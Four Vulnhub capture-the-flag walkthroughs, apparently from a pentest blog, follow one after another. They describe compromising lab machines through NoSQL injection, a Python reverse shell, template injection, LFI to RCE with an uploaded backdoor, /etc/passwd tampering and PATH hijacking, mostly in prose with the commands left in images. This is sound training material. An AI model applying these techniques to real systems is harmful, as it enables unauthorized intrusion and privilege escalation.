MuzzyBox: 1: Vulnhub Walkthrough

Introduction

Today we are going to crack this machine called MuzzyBox. It was created by Muzzy. Duh! This is a Capture the Flag type of challenge. The approach towards solving this machine is a bit different from the standard procedure. It consists of 3 Challenges. Each having a flag of its own. Let’s get cracking!!

Penetration Testing Methodology

  • Network Scanning
    • Netdiscover
    • Nmap
  • Initial Enumeration
    • Browsing HTTP Service at port 80
  • Challenge #1
    • Browsing the HTTP Service at port 3000
    • Downloading the idcard.png template
    • Editing the idcard.png
    • Reading Flag #1
  • Challenge #2
    • Browsing the HTTP Service at port 8989
    • Getting a Python Shell
    • Reading Flag #2
  • Challenge #3
    • Detecting of the Server Side Template Injection
    • Getting shell using tplmap
    • Enumerating the shell
    • Getting SSH session
    • Enumerating ls command
    • Reading Flag #3

Walkthrough

Network Scanning

To Attack any machine, we need to detect the IP Address of the Machine. This can be done using netdiscover command. To detect the IP Address, we can co-relate it with the MAC Address of the Machine that can be obtained from the Virtual Machine Configurations Setting. The IP Address of the machine was detected to be: 192.168.1.6

Now that we have the IP Address, we need to enumerate open ports on the machine. For this, we will be running a nmap scan. To get the most information and fast, we ran the Aggressive Scan.

The Nmap Aggressive scan quickly gave us some great information. It positively informed that the following ports and services are running 22 (SSH), 80(HTTP), 3000(HTTP), 15000(HTTP). So nice of the author of the machine to give us so many HTTP services to explore. Let’s move on to Enumeration Stage.

Initial Enumeration

Let’s start with the traditional HTTP port. Port 80. We ran the browser and opened the IP Address of the Machine. It gave us an Index Page. It consists of a text file named index.txt. That was odd but okay. We moved on further by clicking on that file.

Here we get this nicely crafted introduction of the Lab Environment. This machine has been divided into 3 Challenges. Each containing a flag.

Challenge #1

Let’s Start with Challenge #1. The information about this challenge state that Washington University created an online library. But currently, only Principle is Authorized. The library is hosted on the HTTP service running on port 3000. Also, there is an idcard named image hosted on port 9633. Let’s start with an enumerating port of 3000.

Okay, that’s quite a dull library. But in the end, it is a library. If you go through the introduction text written. You might get to know that the developers of the library have implemented a security measure to prevent unauthorized access. They have used an alternative of SQL DB to secure the database. How nice of them to provide us this sweet information. The process to enter the library is to upload the idcard on this page and then the access is allowed.

The template is provided to us on the port 9633. Let’s take a look at it. Now we know that the principal has access to the library. But what we don’t know is the name of the principal. We will have to figure out a way to get through this.

For starters, we downloaded the idcard.png file to our attacker machine using wget command.

Initially, the introduction on the page at 3000 port told us that the authentication is checked using an alternative of SQLDB. Now if we think about it, if they are not using an SQLDB then the next best alternative is NoSQL. We tried to google some of the NoSQL based payloads that can help us in this situation. We found quite a few. We decided to use this one.

Now we took the idcard.png image that we downloaded and tried to edit it to make it look like the image shown in the screenshot given below. It is quite easy you can use any online tool for the same. We made the following changes.

Now that we have the idcard ready. Let’s upload it. The upload was a success and we have successfully cracked the Challenge #1. This flag is in the form of a PIN. Let’s take note of this, we may need it down the road.

Challenge #2

We move onto the next challenge. After we broke the authentication in the previous challenge, the University developed a new website. How Unnecessary! It is under maintenance. We are asked to list the current directory and read the flag file. It shouldn’t be difficult. The new website is hosted on port 8989. Upon browsing the webpage, we see that it is an error page. While we were casually looking at the errors, we saw that there was a console icon. We hovered over it and got the message that it will “Open an interactive python shell in this frame”. How convenient!

We clicked on the console icon, we are greeted with a pop that tells us to enter a PIN. If we remember correctly from the previous challenge we received the flag in the form of a PIN. Let’s try it to get in.

PIN: 123-456-789

Since it was in “Python Interactive Shell”, we need some python shellcode to pop up a shell over here. We went to the pentestmonkey reverse shell cheat sheet and got the Python Reverse shell. We modified it a little bit to execute it line by line as shown in the given image. We chose the port 5555 for getting the reverse shell and opened the netcat listener for the same. As soon as we execute the last command, we see that we have a shell.

The objective of this challenge was to list the current directory, so we ran the ls command. We found a directory named flag. Inside this directory, we found a script called ctf2.py. We read the contents of this script to get ourselves the second flag.

Again we seem to have a hint in this flag. It tells us to read a file at the home directory of the user webssti.

Challenge #3

Two challenges down. One to go! We went back to the index for the description of the third challenge. It says that when we compromised the machine in the last challenge the root user started to audit the machine. Well, he/she really should do a better job. It wasn’t that difficult to exploit them. We are told that the root user is using sudo and bash with the ls command. This seems interesting. At last, we are told to read the final flag using an “Out-of-Band technique”. This challenge is hosted on the port 15000. We modified the URL to print the Raj name. #PersonalTouch. So what kind of vulnerability is this? Its Elementary, My Dear Watson. It is a Server-Side Template Injection.

For exploiting this vulnerability, we have just the tool. It is called tplmap. It is available on GitHub. To use it we cloned it to our attacker machine. After that, we traversed into this directory to find the python file named tplmap.py. We ran it with the proper parameters for the injection point as well as the -os-shell parameter to pop out a shell.

We got ourselves a shell in no time. We ran the id command to enumerate the user. Back to the previous challenge. We saw that the flag from the previous challenge asks us to read a file in the home directory of this user. We are indeed logged in as the webssti user. We checked the directory using the pwd command as well as listed the current directory contents using the ls command. There was a directory named ssti. We listed its contents to find the no_flag.txt file that we were looking for. We read the file using the cat command. This tells us the ssh username as well as password. Brilliant!!

Time to get that SSH shell. We entered the previously found credentials and got logged in. As the final flag was inside the root folder, we tried to read that flag. But we were unsuccessful.

Time to work our mind to escalate privilege on this shell. We ran the sudo -l command to enumerate but we were unsuccessful. We remembered from the introduction that the root user was using sudo as well as bash with the ls command. So it came us that Path Variable method might work here. We used the echo command to print the path for the ls command. After this, we enumerated which ls command we are running. We found that directory /usr/local/sbin was writable by our user. This means that we can create a file there and name it ls. Then we will be able to execute that file. Let’s do this using the nano command as shown in the image given below.

We used curl command to send a POST request onto our attacker machine with the contents fo the Final Flag. Clever Isn’t it?

Now before we save that file and exit the nano editor, we started the netcat listener on the port 1234. In no time we have the Final Flag.

This was a good set of challenges. I enjoyed it a lot while solving it. The first and second challenge was nice and surely something that you can come across in real life. Also this format of small challenges instead a standard CTF was a fresh approach. I appreciate the author and I look forward to more in this series.

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the Covid-19. I am writing this article while working from home. Take Care and be Healthy!

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

Sahu: Vulnhub Walkthrough

Today we are going to complete a boot2root challenge of the lab Sahu. The lab is developed by Vivek Gautam and can be downloaded from here. Lab us fairly for the beginners and helps to get familiar with the concept of CTF challenges. It also helps to develop your enumeration skills as it solely focuses on enumeration.

Penetration Testing Methodology

  • Network Scanning
    • Netdiscover scan
    • Nmap scan
  • Enumeration
    • Browsing HTTP service at port 80
    • Directory Bruteforce using dirb
    • Enumerating Source Code
    • Directory Generation using Crunch
    • Bruteforce Zip Password using fcrackzip
  • Exploitation
    • Connecting to Target using SMB
    • Enumerating SMB
  • Post Exploitation
    • Running LinEnum script
  • Privilege Escalation
    • Writable /etc/password file
    • Generating Password Hash using Openssl
    • Appending hash to /etc/passwd
    • Getting Root Privileges
  • Reading Root Flag

The first stage in starting the challenge is knowing your target and for that following command will be used :

After that we will start active reconnaissance by scanning our target IP using nmap with the following command :

With nmap, as it can be seen in the image above, open ports are shown. These ports are 21, 22, 80, 139, 445 with the services of FTP, SSH, HTTP, NetBIOS-ssn samba. Because of banner grabbing, it was observed that anonymous login was enabled in FTP. Therefore, try to log in from FTP with the following commands :

Here, enter the password anonymous. Once you are logged in from FTP use the ls command to check the contents it has. The single zip file was found here, namely ftp.zip.

When opened, it asked for a password but as the password is not known we moved further. Open the IP address in the browser and the can he webpage as shown in the following :

Now we enumerated the directories with directory buster using the command :

As a result, we found a directory /H/A/R/, if you remembered that the image on the web-page was of Haryana so we can correctly assume that the full directory will be /H/A/R/Y/A/N/A/ and when opened in the browser you can see the following :

In the source code, there will be a phrase saying “try to extract with hurry”. Now, this is something useful.

We had found an image on a web page and we have the hint in the source code. So we will use steghide to extract any metadata and to do so, use the following command :

And when asked to enter the word hurry and as you can see in the image below we found a file and then read it said, “I have found the password for a zip file but I have forgot the last part of it, can you find out. 5AHU**”

Now, according to the hint, it means that the first four characters of the password are 5AHU and password is of six characters in length and we must find last two characters in order to get the password. We can easily do this using crunch and construct a dictionary to fuzz up the password. The last to characters could be of any combination i.e. it can be alpha-numeric or special character and so on, therefore, use the following set of command to make a dictionary using a crunch of every possible combination:

Once our wordlist for dictionary attack is created we can commence our attack using fcrackzip and for that use the following command :

The password has been cracked using the above method and retrieved an ftp.txt file in which a username and password is found. As from the nmap port scan it was clear that the SMB port(139) was open. We ran the Enum4Linux to enumerate the SMB service

Thus, it is clear that a connection through sambashare can be made using smbclient and so to do the same, following command will be used :

and when asked provide the password which was retrieved from ftp.txt.

Now, connecting through smbclient gave us an opportunity to traverse around which lead us to find ssh.txt. upon reading ssh.txt file revealed a username and password. As the username and password are found in ssh.txt it can safely be assumed that these are the credentials for SSH login. Let’s try to login through SSH, using the following command :

Further, provide the password when asked and log in through SSH will be successful. After logging in the machine, we decided to use the wget command to transfer the LinEnum script to the Target Machine. Followed by the transfer, we gave the proper permissions to the script and then run it.

As a result, we found that /etc/passwd file is writable which allows us to make a new user and alter its permissions as per our desires.

To make a new user, use the following command :

Now we have the hash, all we need is to append this user hash in the target machine.

On the target machine, we use the echo command to add this user into the /etc/passwd file. We can verify that the user has successfully been added by taking a look at the /etc/passwd using the tail command. Now that we have added user, let’s login to that user using the su command. As the user we created had root privileges so we own the root on this machine.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

2much: 1: Vulnhub Walkthrough

In this article, we are going to crack the 2much: 1 Capture the Flag Challenge and present a detailed walkthrough. The machine depicted in this Walkthrough is hosted on Vulnhub. Credit for making this machine goes to 4ndr34z. Download this lab by clicking here.

Level: Intermediate

Penetration Testing Methodology

  • Network Scanning
    • Netdiscover scan
    • Nmap scan
  • Enumeration
    • Enumerating HTTP service on Browser
    • js Vulnerable Detection
  • Exploitation
    • Installation NodeXP
    • Getting meterpreter using NodeXP
  • Post Exploitation
    • Enumerating for User Flag
    • Reading the User Flag
  • Privilege Escalation
    • Enumerating Bash History
    • Scripting for SUID
    • Exploiting SUID
    • Getting Root Access
  • Reading Root Flag

Walkthrough

Network Scanning

We downloaded, imported and ran the virtual machine (.ova) on the VMWare Workstation, the machine will automatically be assigned an IP address from the network DHCP. To begin we will find the IP Address of our Target Machine, for that we will use the following command as it helps to see all the IP’s in an internal network.

We found the target’s IP Address 192.168.0.109. The next step is to scan the target machine by using Nmap tool. This is to find the open ports and services on the target machine and will help us to proceed further

Enumeration

There were quite some services running on the system. But seeing port 80, we wanted to take a look at the webpage that is being hosted on it. We found the target machine riddled with all the Vulnerable Applications like DVWA, XVWA, etc. We tried to get to the system through those but was unsuccessful.

After going through the http services that we found in the nmap, we were running and checking each one of them one by one. Till we reached to a Nodejs Service on port 8081. Upon browsing the port, we saw that it gives back the message “Hello undefined”. This got us thinking that there must be a parameter here that will be defining the name which in our case was undefined.

Exploitation

We explored if we can tamper with this parameter manually. But it takes a lot of time. So, we found this this brilliant tool that will do the heavy lifting for us. As it is hosted on GitHub, we used the git clone command to clone the repository. After cloning, we get into the cloned directory to find the python script and other required files.

We read the README that contained the syntax in which we need to provide the URL of the target.  We run the script as shown in the give image.

The application runs and passes a number of parameters to determine if the Nodejs is vulnerable. After running for a while, it confirms that our target is indeed injectable. It asks if we want to generate a meterpreter shell. We enter ‘y’ for confirmation. After that, it asks us for our Local IP Address and port. We provide the IP Address and port of our Attacker Machine. After providing the details it loads the Metasploit Framework

After we give our confirmation for the generation of the shell, the tool opens up a prompt which starts configuring the Metasploit Framework to attack the target machine.  

Now we see that Metasploit gets loaded and the payload is being uploaded. As soon as the upload of the payload completes 3 sessions are generated.

We can check this using the sessions command in Metasploit Framework. As shown in the image given below we have 3 sessions from the target machine.

Post Exploitation

We interact with the third session using the -i parameter of the sessions command. The shell we got was an improper shell. We need to convert it into a TTY Shell. This can be achieved using the python one-liner. After gaining the TTY shell, we check the user with the id command. On further enumeration, we found a user.txt. We believe this is our first flag!!

Privilege Escalation

As a part of our Post Exploitation exercises, we browsed the .bash_history files. In this file, we found a set of SSH credentials as shown in the image given below.

We try to login via SSH as the root user using the aforementioned credentials. This gave us a root shell. But something tells us that the game isn’t over yet. We ran the ip addr command to get the information about the network configurations of this machine. We found an internal IP Address: 172.17.0.4/16. This IP Address tells us that we are in a docker.

Moving on, we scanned the directory for files and found a file named tdl.txt. Upon opening it we see that it tells us that we have port 21 and Anonymous Access is allowed. We log out the SSH session and try to look for the same tdl.txt file in the host machine. Upon proper enumeration, we saw that the same tdl.txt file was available in /home/4ndr34z/ftp/. This means this directory is shared with the docker.

This means that we can escalate privilege using the SSH connection. We could login as root on the docker and leave a file to invoke access there. Then log out from docker and come back to the target system and execute it. We are going to use the following script for the escalating privilege.

As the script in C, we complied the script using gcc as shown in the image given below. After compiling, we share the file via HTTP server that is generated using a python one-liner.

Now we login as root in the docker as we did earlier. Then we will download exploit binary that we hosted using wget command as shown in the image given below. As it is a SUID, we need to give it proper permissions. We do this using the chmod command.

Now, we log out from the docker and traverse to the location of the file and executed the binary. Upon completion we see that we have the root privileges on this target machine. All that’s left is to read the root flag.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

Inclusiveness: 1: Vulnhub Walkthrough

Another walkthrough for the vulnhub machine “INCLUSIVENESS: 1” which is an Intermediate level lab designed by the author “h4sh5 & Richard Lee” to give a taste to the OSCP Labs. The challenge is same just like any other CTF challenge where you identify the flag with the help of your pentest skill.

Download it from here: https://www.vulnhub.com/entry/inclusiveness-1,422/

Penetration Testing Methodologies

Network Scanning

  • Netdiscover
  • nmap

Enumeration

  • txt
  • User-agent restriction bypass
  • LFI

Exploiting LFI

  • LFI To RCE

Privilege Escalation

  • Abusing PATH Variable

Walkthrough

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is 192.168.29.151.

Let’s proceed with network scan using Nmap aggressive scan as given below.

And as a result, we find that port 21 is open for FTP where anonymous login has been allowed and the directory name as /pub is writeable, and port 80 and 22 are also accessible for HTTP and SSH respectively.

Enumeration

To find any loopholes we need to list more, so we’re browsing the host IP in the web browser, but unfortunately, they were found only the “Apache2 Debian Default page.”

Instead we try to check for the robots.txt file and, as a result, the message “You are not a search engine!” is shown. You can’t read my robots.txt!

Without wasting time, I try to bypass this restriction by editing a new user agent in my firefox using the following steps:

  • Inside the URL tab search for “about:config
  • Then search for preference Name: useragnet
  • Make a right click then > New > String

You get a dialog box; enter the preference name “general.useragent.overriide” as shown in the below image.

Enter the string value to provide useragent “GoogleBot”.

Once the above steps have been completed, the record will be shown for your new edit preference.

Now reload the URL for /robots.txt page and you will be able to read the disallowed entry as “/secret_informtion/” as shown below.

So, we’ve explored /secret_information, it brings a web page that describes “DNS Zone Transfer Attack” and the web page contains two hyperlinks “English & Spanish.”

As I click on the “English” hyperlink, I found that it was calling the en.php via lang parameter in the URL, which means that there could be possibilities for LFI.

Therefore, I try to get /etc/passwd file by abusing the php include of the webpage and as result I got the whole contents of the /etc/passwd file as shown in the below image.

Exploiting LFI

So, it was time to exploit the vulnerability of the LFI by injecting a malicious file and, as you know, the FTP service is available as anonymous and / pub is a writable directory.

We then try to read the “vsftpd.conf” FTP config file by abusing LFI to enumerate the writeable directory path.

We’ve prepared a php file that contains a malicious code that will further trigger remote command execution vulnerabilities.

Now it’s time to upload the malicious file “backdoor.php” on the host machine via ftp, thus follow the below commands

Further, we need to run the uploaded file to execute the malicious code by executing the following:

Using the URL above, try to run the backdoor.php file and simultaneously run the OS command “Id” as shown in the image provided here.

As we have been successful in inducing RCE in the installed application by abusing LFI, we are continuing with Metasploit’s “web delivery” Module to compromise the host machine in order to obtain a reverse connection.

This will generate a malicious PHP code which you’ll use for execution on the web URL as done above.

So, I copied the above malicious code and paste it inside the URL to get the back connection of the host through the URL execution.

Privilege Escalation

Booom!!! We hit the goal and obtain the meterperter session the host machine, since it was boot to root CTF, we need to escalate the root privilege shell, therefore we try to identify all programs or files that have SUID bits enabled.

So, with the help of find command, we’ve got a list of programs running as a superuser that unlocks the SUID bit where I notice /home/tom/rootshell.

Inside /root/tom/ I found rootshell.c file and a compile file rootshell that owns SUID permissions.

According this piece of code if the file is executed as Tom user by calling the function for “whoami” program for validation then you will get a privilege shell else it will print user-ID that is currently logged in will be displayed.

In simple words the rootshell program give a high privilege shell if the output of whoami program will be “tom”.

You can easily take advantage of this configuration by abusing the PATH system. Here, we built a file as “whoami” in the / tmp directory, and write the following bash code to print “tom”

Add a temporary path variable with the help of the following command. you will observe that we had added /tmp as PATH variable.

when all is done then the rootshell to get the root privilege shell just we have obtained here as to shown below.

Finally, we have found the root shell a flag.txt file, this lab has a good combination of basic vulnerability of Web and OS privilege Escalation.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn